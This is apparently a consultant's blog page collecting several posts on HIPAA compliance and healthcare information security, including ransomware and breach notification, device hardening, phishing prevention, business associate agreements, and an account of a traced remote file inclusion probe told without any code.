Chris Apgar, CISSP

1 2 3 5

Are All Ransomware Attacks Breaches?

It’s one of those questions that never goes away.  The answer is, “Maybe” and very definitely, “Not always.” Contrary to popular belief, even after ransomware attacks, the safe harbor still applies when it comes to breaches.  If your PHI data was encrypted prior to the ransomware attack that encrypted (aka “held for ransom”) it, you may very well not have suffered a breach. Which means that there may be no need to conduct a four-factor risk assessment.

If only it could be so simple. However, per OCR’s weigh-in, you do need to ascertain that the data attacked was encrypted at the time. If it was encrypted, it’s a security incident, but not a data breach. I’ll dig into that shortly.  Far too often I see posts and blogs that adamantly declare, “If a ransomware attack occurs, it must be a breach.”  Not so fast. It’s not so black and white.

OCR has stated that it’s a fact-based determination as to whether or not a breach occurred. If a breach, then you do need to notify OCR, individuals and potentially, the media.  If you run into a consultant (and sometimes counsel) who states that all ransomware attacks absolutely equal a breach, get a second opinion.

Data Encryption & the Burden of Proof

Here’s the flip side – when encrypted PHI may become unsecure, representing a breach due to a ransomware attack. Keep in mind that when you’ve powered up and logged in to your laptop or other mobile device, data may be unencrypted at the time because you’re accessing the data. When ransomware hits and those files are unencrypted at the time of the attack, you may have a breach of unsecured PHI on your hands.

But – if you do use full disk encryption and your laptop was not turned on (which means your laptop wasn’t unencrypted), or if no files were unencrypted at the time of the attack, the PHI was not compromised. No breach occurred.

Also, if the ransomware attack hits your backup media, encrypted at the time of the attack, there is a high likelihood that no PHI breach occurred.  Triple-check to be sure and be able to prove it if OCR comes to call. The burden of proof lies with you.

The burden of proof is greater under other circumstances, like when a ransomware attack occurs and PHI is not encrypted.  At that point, you absolutely need to conduct a four-factor risk assessment.  It bears mentioning, though, that if you have top talent forensic analysts who can prove that no PHI was siphoned off, you still may not be required to notify OCR or individuals because the PHI was not compromised.

Clearly, it’s not a simple black and white, yes or no answer to the breach question. Be careful. Preserve all evidence. Look closely at the circumstances to make sure no breach occurred that requires notification. But if a consultant or counsel, going on the basis of a blog post, says that you absolutely must notify because ransomware attacks always equal a breach, don’t take my word for it. Just ask OCR.

Compliance Planning includes the “what to do” in the case of a security incident and data breach. Chris Apgar, CISSP and Julia Huddleston, CIPP, CIPM, work with clients nationwide on HIPAA privacy and security compliance, and address the need for assistance with expanded use of electronic health information exchange. They also prep clients for the rigorous process of HITRUST, SOC2 and ISO certifications.

Perimeter Security: It’s the Simple Things That’ll Get You

Are you sure your medical records aren’t accessible by outsiders? Maybe check your perimeter security. I’m not talking about fancy technical security gadgets, but the simple, obvious things like setting a password on your internet-facing applications.

Here’s why I ask. Did you hear about the 187 medical system servers not protected by passwords or necessary perimeter security measures? Thank the recent Pro Publica investigation for that bombshell.  An example: with just a simple data query, a MobilexUSA server exposed the names of more than a million patients!  The investigation uncovered the release of names, birthdates, and in some cases, social security numbers.

Get back to the basics. Avoid the obvious errors like

  1. leaving default passwords on servers (ask the State of Utah about their massive breach),
  2. not setting passwords at all and other blatant mistakes.

You lose patient trust, and you lose money.  There are notification costs, harm to your reputation, not to mention significant OCR fines.  Another big expense? The regulators’ imposed corrective action plans (CAPs).

Let’s look at the password issue alone. Basic perimeter security doesn’t stop at the need to change default server passwords, and to set up an original password.  Take it up a notch. Make sure the passwords you set aren’t easy to guess. Get complex. For cybercriminals, it doesn’t take a lot of computing power to crack a simple password.  Take it for granted that you need to set complex passwords on all of your devices.

Too often, it’s the simple things that get you.  If simple mistakes are why your data is exposed to the internet, you’re setting your organization up to an OCR finding of willful neglect.  That will definitely lead to civil penalties or monetary settlements.  Remember, fancy technology isn’t your biggest risk; it’s people and easy mistakes with significant implications.

No doubt, limited resources are an issue for smaller healthcare organizations like small clinics and health information technology (HIT) startups.  On the other hand, the adverse impact of not attending to even simple things can put smaller organizations out of business.  If you’re a smaller organization, or just not sure where to start, try the Office of the National Coordinator for Health Information Technology (ONC). There are plenty of no-cost resources available, like the toolkit for providers. Tackling perimeter security can be overwhelming, which is why it’s essential to start small, with the basics.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally known speaker and author. He most recently authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT. Chris is also a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law, and electronic health information exchange.  

RFI Vulnerability Lesson: Beware of Who You (try to) Hack

Isn’t it rewarding when a fellow security professional posts about an attempted hack of his personal website that he turned into a lesson in website security? And in the end, hacked the hacker? That’s exactly what happened with Larry Cashdollar, a senior security response engineer at Akamai. Cashdollar noticed something peculiar in the logs on his personal website. He dug further and turned up signs of someone scanning for remote file inclusion (RFI) vulnerabilities.

Before diving into the details, if you’re not sure what an RFI vulnerability is, definitely ask your web development and website management team if they’re aware of this type of vulnerability.  And if they don’t know, they need to do some research to prevent hacking attacks on your websites.  You can satisfy your curiosity – and share with your web team – this link to more information about it.

On to the Hacking Attempt

Larry Cashdollar told The Register his site’s logs showed that a  would-be attacker was probing for RFI holes to trick web applications into running a remote malicious script.  The hacker was trying to load a file using a custom tool that Cashdollar had created (!).

The hacker test was a generic test used against websites where they can figure out the input, supply a web address and see if they can execute on the input.  Unfortunately for the attacker, Cashdollar used the tool’s logs to trace back to the file that the attacker was trying to load. Then Cashdollar assessed that and other files the hacker had ready to execute to take over vulnerable websites, and was able to extract the criminal’s email address and their preferred language – Portuguese.

What was the purposes of the RFI vulnerability probe? The attacker wanted to install phishing pages that masqueraded as a legitimate bank’s login webpage, and then direct victims to the hacker’s page to collect bank account credentials.  This was a way around installing more sophisticated code to capture cryptocurrency.  It was just a matter of redirecting someone to a malicious site because the initial fake webpage looked legitimate.

3 Big Takeaways from the RFI Vulnerability Probe

Score one for the good guys! In this case the security professional caught and tracked down the attacker.  Now we need to take it as an alert to professionals who’re responsible for monitoring website security.  From Cashdollar’s account of the incident, the big takeaways for website administrators are the importance of:

  1. Diligently monitoring the audit logs
  2. Following a solid patching program for site management tools
  3. Writing web code that cannot be exploited for RFI and other known vulnerabilities.

If your website developers and administrators don’t know and don’t watch, you may not be as lucky as Cashdollar.

Chris Apgar, CISSP, CEO and president of Apgar & Associates, LLC is a nationally recognized expert and educational instructor on information security, privacy, HIPAA, the HITECH Act, state privacy law and electronic health information exchange.  A nationally known speaker and author, Chris authored the McGraw-Hill Healthcare Information Technology Exam Guide chapter on the regulatory aspects of health IT.

Business Associate or Conduit? Why a BAA likely applies to you.

Ever run into a vendor who claims to be a conduit versus a business associate (BA)? It happens all too often, in my experience. Here’s the problem: the conduit exception is a narrow one. If you’re storing PHI data, even encrypted PHI where you don’t have the encryption key, you’re a BA. Sign the Business Associates Agreement (BAA); it applies to you.

Not convinced? Let’s look at the preamble to the Omnibus Rule of 2013. HHS said, “The conduit exception is a narrow one and is intended to exclude only those entities providing mere courier services, such as the U.S. Postal Service or United Parcel Service and their electronic equivalents, such as internet service providers (ISPs) providing mere data transmission services. As we have stated in prior guidance, a conduit transports does so on a random or infrequent basis. Thus, document storage companies maintaining protected health information on behalf of covered entities are considered business associates, regardless of whether they actually view the information they hold.”

With that HHS summary in mind, you can see it’s pretty difficult to market services and storage to the healthcare industry without a BAA and think you won’t run afoul of HIPAA. Yet even as recently as a few years ago, our privacy and information security firm would encounter storage vendors and document sharing vendors who would not sign a business associate agreement. Again, just because you can’t access the PHI doesn’t mean you’re not a business associate.

In OCR’s May 2019 guidance, you’ll find a list of BA liabilities. Those remind BAs of their compliance responsibilities in regard to HIPAA regulations. OCR’s reminder list also notes that BAs have a duty to execute a business associate agreement with their BA subcontractors. What isn’t mentioned, but is required, is that covered entities (CE) and BAs must  execute a BAA with each other.  So if you’re not an internet service provider (ISP), or the US Postal Service (and the like), plus you store PHI, you need to execute a BAA to be in compliance with HIPAA regulatory requirements.

I’ll end with a cautionary note about vendors convinced they aren’t a business associate. Covered Entities, if your vendor is unwilling to sign a BAA, yet they have access to your PHI, it’s probably a good idea to find another vendor. It may be that your vendor who stores paper charts or other PHI doesn’t realize that they’re a business associate. Or it could be that, in the case of a storage unit, the storage facility owners simply don’t know what’s being stored. But if PHI is involved, then you need to execute a business associate agreement.

Whether you’re a physician practice, a medical transcription service, or a TPA providing a health plan with claims processing services, you’re dealing with HIPAA compliance. Give us a call: 503-384-2538 for help to assure you’re on top of it.

Should you trust Alexa with your health information?

By now you’ve likely heard that Amazon is moving into the HIPAA space with Alexa.  In conjunction with their partners, they’re launching what Amazon calls “HIPAA compliant” apps.  If only it were that easy to create a HIPAA covered app, or as Amazon calls it, skill.  As with Amazon Web Services (AWS) it’s ultimately up to the individual developers to honor the law.  While Amazon may well be a trusted third party, if developers don’t build apps or “skills” with privacy, security and HIPAA compliance in mind, I wouldn’t trust Alexa with any of my healthcare data.

Having worked with a number of software development companies in the healthcare space, I can tell you that more often than not developers want to create cool and useful things. The problem with that is cool and useful don’t always automatically align with security and privacy needs. In fact, in the development process you won’t often find security and privacy at the top of the priority list.

Time, Trust & Alexa Users

Trust but verify, folks. If I were the covered entity or business associate planning to eventually trust the Amazon platform to adequately secure protected health information, I would want assurances and proof that the developers of any app/skill have privacy and security baked in.

Granted, Amazon has indicated that trust takes time to build. That it will be a while before patients widely trust Alexa with sensitive health information.  Ok, let’s say we’re down the road a way.  Trust has been earned.  Now we face another potential issue that has nothing to do with the platform or any of its available apps/skills.  The concern lies with the end users.  End users are not always savvy when it comes to protecting sensitive personal information. I think this is where there’s a definite need for some education on the part of partners, Amazon and healthcare providers.

Right now, when Alexa is on, it listens to all voices in the room, all the time. How awful would it be if an end user thought he or she was taking advantage of touted HIPAA compliant solutions but instead was airing sensitive information using another Alexa app?  Hopefully Alexa will also be smart enough to not broadcast protected health information like “You need to follow up with your [insert-private-condition-here] specialist” to the whole house.

Alexa (Amazon), are you listening?

Consumers in the Regulatory Driver’s Seat: Protecting Personal Data Privacy

Consumers on the warpath to protect personal data privacy are making strides in state houses. For instance, here’s an update on Oregon’s Senate Bill 703 re selling health information. If you use Big Data at all, you’ve probably been following this Bill. It’s basically saying that anyone selling personal health information, although thoroughly de-identified, would need to pay the source for the privilege, i.e., you and me. As you may imagine, research groups and analysts who may touch any Oregonian’s de-identified PHI, not to mention privacy officers at the source of de-identified data, are watching this closely.

You can likely thank Facebook backlash for this Bill. Taking personal data and sharing it without user knowledge has caused huge problems for the social media giant. Now we’re hearing that they’re going to reel it all in, but how do you get the genie back in the bottle?  The trust is gone, and SB 703 is just one instance of how outraged consumers are at how data is being used.

From a compliance perspective, the information, aka personal data, is already de-identified PHI, so that’s not the basis for the Bill. It’s a clear call for personal data privacy protection beyond the pale of what we’ve seen up to now. You can also look at the yet-to-go-live California Consumer Privacy Act as another example of privacy protection taken to the Nth degree.

This isn’t to say that personal data privacy isn’t important because it absolutely is, it’s merely to point out that the logistical reality of complying with either SB 703 or CCPA is a nightmare we’ve yet to face. You can hardly blame people for playing ostrich when confronted with such a daunting task. You can also hardly blame people for pushing back on companies being able to use personal information for free.

We’ll be writing more on CCPA and its potential effect on business operations both outside and within the healthcare environment. In the meantime, should Oregon’s SB 703 move further down the path to fruition, we’ll weigh in on that, too.

Need specialized insight on these and other data privacy and information security regulations? Contact Apgar & Associates, LLC at 503-384-2538. Our in-the-trenches knowledge and professional consulting will help you and your workforce with compliance and critical certification preparation.

How to Harden Laptops, Tablets & Smartphones to Protect PHI

When your goal is to protect PHI on laptops and mobile devices, keep in mind that information security is only as strong as its weakest link. Lenient information security standards exponentially increases the risk to sensitive healthcare data. It can also place you in non-compliance with the HIPAA Security Rule. On top of that the courts are likely to see it as a security failing in the case of data breaches. Now you’re looking at an expensive law suit!

An abbreviated overview of the HIPAA Security Rule’s general requirements calls for covered entities and business associates to do the following:

  1. Ensure the confidentiality, integrity, and availability of all electronic protected health information the covered entity or business associate creates, receives, maintains, or transmits.
  2. Protect against any reasonably anticipated threats or hazards to the security or integrity of such information.
  3. Protect against any reasonably anticipated uses or disclosures of such information that are not permitted or required under Subpart E of this part.

Can you demonstrate device encryption?

CEs and BAs, keep in mind, too, that you can’t take advantage of the HIPAA Breach Notification Rule safe harbor if you can’t demonstrate that stolen devices were actually encrypted at the time. If the device isn’t locked down, it’s hard to prove that the device was secure and no PHI or PII accessed when the device is lost or stolen. While Apple tablets and smartphones are natively encrypted, either end users or IT staff need to enable or turn on encryption for Android tablets and smart phones, Windows laptops, tablets and smartphones and Macs. Take the below steps to protect laptops, tablets and smartphones – and to protect PHI.

7 Steps to Laptop Data Security & Intrusion Protection

  1. Remove administrator privileges for all company-owned laptops and lock down devices
  2. Install and maintain mobile device management tools that support:
    1. Remote wipe of hard and flash drives
    2. Device tracking in the event a device is lost or stolen
    3. Enforce encryption of hard drives and flash drives
  3. Install and periodically update anti-malware applications
  4. Install and periodically update firewall applications
  5. Enforce strong passcodes or passwords and require periodic password changes
  6. Enable biometric authentication if available
  7. If using Windows, properly set share and Microsoft New Technology File System (NTFS) permissions to keep network snooping to a minimum and unauthorized users out of sensitive files stored locally

6 Ways to Protect Tablet & Smart Phone Security & Prevent Intrusion

  1. Remove administrator privileges for all company owned tablets and smartphones and lock down devices
  2. Install and maintain mobile device management tools (company owned and personally owned; BYOD) that support:
    1. Remote wipe of flash drives
    2. Device tracking in the event a device is lost or stolen
    3. Enforce encryption of flash drives
    4. Preferably – segregate company data from personal data on BYOD devices
  3. Install and periodically update anti-malware applications (Exception: iPhones and iPads)
  4. Install and periodically update firewall applications (Exception: iPhones and iPads)
  5. Require strong passcodes or passwords and regular password changes
  6. Enable biometric authentication if available

Device hardening is considered a reasonable security safeguard which means it’s a “must do” when it comes to HIPAA compliance and state law compliance in some states. Take the necessary steps to protect PHI and avoid the bad headlines, regulatory penalties, law suits and lost business. If you need to beef up compliance planning, conduct your security risk analysis, or just aren’t sure where to start with any of it, give us a call: 503-384-2538.

5 Ways You Can Reduce Phishing Risk

Malware attacks via phishing knocked it out of the park in 2018. Phishing attacks account for an inordinate number of the data breaches and compromised networks. In fact, the Identity Theft Resource Center (ITRC) reported that “one-third of all security incidents last year began with a phishing email.” As the cyberattacks get sneakier, everyone – workforce and consumers – are at ever-higher risk of breaching data privacy and security.

From fake offers of free World Cup tickets to false GDPR privacy policy notices, 2018’s worst phishing scams cut no corners on creativity. Organizations large and small have implemented penetration testing, aka pen testing, to see how well their technology and their workforce withstand malware attacks. If we’ve learned one thing, it’s that size doesn’t matter to cyberattackers.

5 Pointers to Avoid Getting Hooked

  1. Conduct penetration testing, aka pen testing. Pen testers employ the same tactics as hackers, but to your benefit. You’ll discover how effective your firewalls and patches are as well as how well your workforce “gets” anti-phishing training.
  2. Conduct phishing-specific training. Human error continues to be a big gap in privacy and security effectiveness. One click or tap on a link or attachment opens the gate to phishing malware. Scenario-specific, interactive, out-of-the-box training sessions make the biggest difference.
  3. Stay on top of the latest phishing and smishing (mobile device phishing via text) techniques so you can take measures to prevent systems infiltration as well as keep your workforce alerted.
  4. Encourage transparency internally and externally. Whether it’s an employee who opened the backdoor or a third party partner, you need to know when security has been breached. Promote admitting, “I may have messed up” and what to do the second it happens (aka per security incident response).
  5. Keep anti-virus, anti-spam and anti-spyware software current. Hackers are smart cookies but if you’re not on top of essential technology safeguards, they don’t even have to try.

If we were going to choose one tech tip and one human error prevention tip to focus on in Q1, we’d select pen testing and anti-phishing training. One pen testing researcher is so intent on lighting a fire against phishing that he published his scarily successful pen test.

And should all prevention measures fail, you’ll need backup. Which brings us to: Keep recent backup system copies readily accessible. If phishing does get through, you’ll want to be able to quickly go back to a “safe” backup so you can get operations back up and running. With response measures in place, the sooner you know, the faster you can act.

Word of Warning: join.me Does Not Sign Business Associate Agreements

A few days ago, after making multiple attempts on behalf of a client to verify and clarify how join.me supports HIPAA compliance, specifically participating in Business Associate Agreements, I found that they do not. In fact, they do not consider themselves subject to HIPAA regulations, regardless of the possibility of PHI being stored on the join.me platform. Therefore – as you’ll see in the exchange below – they “do not sign BAAs.”

So, a warning to those who use join.me and store recordings that include PHI on the join.me platform – join.me is unwilling to execute a business associate agreement with covered entities and business associates. If you need a video communications platform that supports the storage of PHI and is HIPAA compliant, it’s wise to look elsewhere.

Below is a reprint from a warning I posted on LinkedIn just the other day. Please feel free to share your experiences of similar situations and vendors with me in the comments area on that post. Here’s my email exchange with join.me.

Original Question/Comment

I’m attempting to get an answer one last time. I represent a mutual customer who currently uses join.me who is required to comply with HIPAA. Given the fact that protected health information (PHI) may be stored on join.me‘s platform in the form of recordings, join.me is required to sign a business associate agreement with my client. If join.me is unable or unwilling to sign a business associate agreement, I need to recommend that my client change to another conferencing platform such as Zoom or WebEx who will sign a business associate agreement.

On Dec 2, 2018, at 6:42 PM, join.me Support wrote:

Hello Chris,

Thank you for contacting join.me.

We actually do not sign BAAs because our services are not HIPAA compliant as HIPAA compliance, per se, is applicable only to entities covered by HIPAA regulations (e.g., healthcare organizations).

That being said the technical security controls employed in the join.me service and associated host and client software can meet or exceed HIPAA technical standards. But again, we are unable to sign any BAA’s.

If we have answered your question, we will send you an email in the next few days asking for your feedback. We value your opinion and thank you in advance for taking the time to click on the survey link and letting us know how your experience was with our team.

Thanks again for using join.me.

L***  | Customer Support Representative
LogMeIn, Inc.

My reply to join.me

You (join.me) answered my question. My client will be looking for another vendor. While the functionality may be there to secure the data, my client would be violating HIPAA by continuing to use the join.me platform. As the US Department of Health and Human Services, Office for Civil Rights has stated, claiming to not be a business associate doesn’t mean you actually aren’t one. I also feel a need to remind covered entities and business associates they shouldn’t be contracting with join.me if the platform will be used to store recordings that contain PHI.

Chris Apgar, CISSP
www.apgarandassoc.com

My Recommendation

Ultimately, I had to recommend to the client that they not use join.me but check into online video and document storage with vendors who will sign BAAs, such as Zoom or Webex. The instance serves as a reminder that no matter how technically secure a vendor professes to be, if you plan to use their platform or services for anything pertaining to PHI, there needs to be a BAA in place, documenting that they follow HIPAA regulatory requirements as relates to PHI protection. And as I indicated to the customer support representative above, claiming that you’re not a business associate doesn’t magically transform you into not being one!

Chris is a frequent LinkedIn Pulse contributor. You can connect with him here, and you can follow Apgar and Associates on LinkedIn here.

Privacy & Security Forum Update: OCR Activity, Audit Protocols, Ransomware & the HIPAA Security Rule

Julia and I had the pleasure of attending the 2018 Privacy & Security Forum a couple of weeks ago.  One of the sessions I attended was focused on what’s happening at OCR these days.  The speaker was Roger Severino, Director of OCR, and the moderator was Adam Greene, partner at Davis Wright Tremaine, LLP.  I heard about new OCR activity, got an answer to my question about the future use of the OCR audit protocols, and key OCR takeaways.  I have the pleasure of passing the Forum’s highlights on to you.

OCR audit protocols use.

The big news to me was the answer to one of my questions about OCR audit protocols.  For over a year, we’ve been saying that for investigations and enforcement activity that it’s likely the OCR will use the audit protocols that were updated from the phase 2 audits.  I took the opportunity to ask the top authority at OCR about future use of the protocols.  Mr. Severino confirmed – that’s just what OCR intends to do and may already be doing so.

Other OCR activity includes:

  • Updating HIPAA/FERPA guidance (jointly with the US Department of Education)
  • Issuing a notice of proposed rule making (NPRM) request for information (RFI) HITECH Act accounting of disclosures language (the last NPRM was not well received by the industry and privacy advocates)
  • Evaluating ways OCR can distribute funds received as part of enforcement related civil monetary penalties and settlement agreements to victims of breaches of their PHI

That’s a fair amount of activity.  The only caveat is we don’t know how soon “soon” is.

FBI and FTC weighs in on ransomware attacks.

I also attended a session that featured speakers from the FBI and the FTC.  Along with Mr. Severino the FBI said the first step covered entities and business associates should take is to contact the FBI if you’re attacked by ransomware.  The FBI has agents in place to investigate ransomware and help covered entities and business associates get their data back without paying a ransom.  This is something to keep in mind when you’re updating your security incident response plans especially given local law enforcement may not have the resources to assist with an investigation.

Is the HIPAA Security Rule being updated?

There has been much talk over the past few years about the need to update the HIPAA Security Rule.  The Director indicated that he things there is nothing fundamentally broken with security rule so it’s unlikely the rule will be amended any time soon.  The Security Rule is technology neutral and is flexible.  It hasn’t become obsolete due to changes in technology and there has been a lot of change since the rule was published in 2005.

OCR phase 2 audit results and plans for enforcement.

Mr. Severino shared that OCR was finalizing phase 2 audits and results will be published soon.  As far as the audit program goes, he indicated that there would likely be no more formal audits.  Instead, the audits would become part of OCR’s enforcement activity.  He believes this promotes an enforcement mindset with a higher-level rigor, similar to enforcement activity conducted by the US Department of Justice.

An audience member asked if enforcement would continue unabated or would be curtailed under this administration.  The answer: OCR is still on track with enforcement.  Mr. Severino would like to see enforcement go down as a reflection of the expansion of a culture of compliance, which OCR has been pushing since 2011.  He did add that the industry was far from there today.

Adam Greene asked Mr. Severino to provide three takeaways for the audience.  The Director said:

  1. You need to treat PHI as if it was a bar of gold. That includes conducting periodic risk analyses, encrypting PHI and securing mobile devices.
  2. “We’re from the governments and we’re here to help” – tap into OCR resources through its website, the most popular website for the US Department of Health & Human Services.
  3. “Help us help you” – review NPRMs, RFIs, and other information OCR would like input from the industry about and provide feedback. Periodically check regulations.gov to check on opportunities to provide OCR feedback.

All in all it was a great conference and good to get information from the proverbial horse’s mouth.  Julia will be sharing information about some of the sessions she attended.  Look for more in the weeks to come!

 

1 2 3 5